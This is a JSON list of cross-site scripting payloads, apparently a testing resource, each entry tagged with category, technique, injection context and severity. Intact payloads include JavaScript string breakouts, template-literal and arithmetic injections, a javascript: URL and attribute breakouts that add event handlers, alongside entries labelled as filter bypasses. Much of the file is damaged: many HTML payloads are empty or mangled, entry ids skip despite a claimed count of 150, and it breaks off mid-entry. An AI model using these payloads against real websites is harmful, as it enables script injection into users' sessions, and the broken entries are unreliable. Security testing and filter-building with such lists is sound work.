{ "version": "1.0", "count": 150, "generated": "2025-12-17T04:40:14.920Z", "payloads": [ { "id": 1, "payload": "", "category": "basic", "technique": "script-tag", "context": "html", "description": "Classic XSS payload using script tag", "severity": "high", "browsers": [ "all" ] }, { "id": 2, "payload": "", "category": "basic", "technique": "script-tag", "context": "html", "description": "Display current domain", "severity": "high", "browsers": [ "all" ] }, { "id": 3, "payload": "", "category": "basic", "technique": "script-tag", "context": "html", "description": "External script injection", "severity": "critical", "browsers": [ "all" ] }, { "id": 4, "payload": "

", "category": "event-handler", "technique": "onerror", "context": "html", "description": "Image error event handler", "severity": "high", "browsers": [ "all" ] }, { "id": 5, "payload": "", "category": "event-handler", "technique": "onload", "context": "html", "description": "Body onload event", "severity": "high", "browsers": [ "all" ] }, { "id": 6, "payload": "

", "category": "html5", "technique": "embed", "context": "html", "description": "Embed with JavaScript source", "severity": "critical", "browsers": [ "all" ] }, { "id": 18, "payload": "'; alert(1); //", "category": "javascript", "technique": "string-break", "context": "javascript", "description": "Break out of JavaScript string", "severity": "high", "browsers": [ "all" ] }, { "id": 19, "payload": "\"; alert(1); //", "category": "javascript", "technique": "string-break", "context": "javascript", "description": "Break out of double-quoted string", "severity": "high", "browsers": [ "all" ] }, { "id": 20, "payload": "-alert(1)-", "category": "javascript", "technique": "arithmetic", "context": "javascript", "description": "Arithmetic operator injection", "severity": "medium", "browsers": [ "all" ] }, { "id": 21, "payload": "${alert(1)}", "category": "javascript", "technique": "template-literal", "context": "javascript", "description": "Template literal injection", "severity": "high", "browsers": [ "all" ] }, { "id": 22, "payload": "javascript:alert(1)", "category": "url", "technique": "javascript-protocol", "context": "url", "description": "JavaScript protocol in href", "severity": "high", "browsers": [ "all" ] }, { "id": 23, "payload": "data:text/html,", "category": "url", "technique": "data-url", "context": "url", "description": "Data URL with HTML", "severity": "critical", "browsers": [ "all" ] }, { "id": 24, "payload": "\" onclick=\"alert(1)", "category": "attribute", "technique": "attribute-break", "context": "attribute", "description": "Break out of attribute to add event", "severity": "high", "browsers": [ "all" ] }, { "id": 25, "payload": "\" autofocus onfocus=\"alert(1)", "category": "attribute", "technique": "attribute-break", "context": "attribute", "description": "Attribute with autofocus trick", "severity": "high", "browsers": [ "all" ] }, { "id": 26, "payload": "ipt>alert(1)ipt>", "category": "bypass", "technique": "nested-tags", "context": "html", "description": "Bypass tag stripping filters", "severity": "medium", "browsers": [ "all" ] }, { "id": 27, "payload": "

", "category": "bypass", "technique": "case-variation", "context": "html", "description": "Case variation bypass", "severity": "low", "browsers": [ "all" ] }, { "id": 29, "payload": "

", "category": "bypass", "technique": "template-literal", "context": "html", "description": "Template literal instead of parentheses", "severity": "medium", "browsers": [ "all" ] }, { "id": 30, "payload": "

", "category": "encoding", "technique": "html-entities", "context": "html", "description": "HTML entity encoding", "severity": "medium", "browsers": [ "all" ] }, { "id": 32, "payload": "

", "category": "encoding", "technique": "unicode", "context": "html", "description": "Unicode escape sequences", "severity": "medium", "browsers": [ "all" ] }, { "id": 33, "payload": "

", "category": "encoding", "technique": "hex", "context": "html", "description": "Hex escape sequences", "severity": "medium", "browsers": [ "all" ] }, { "id": 34, "payload": "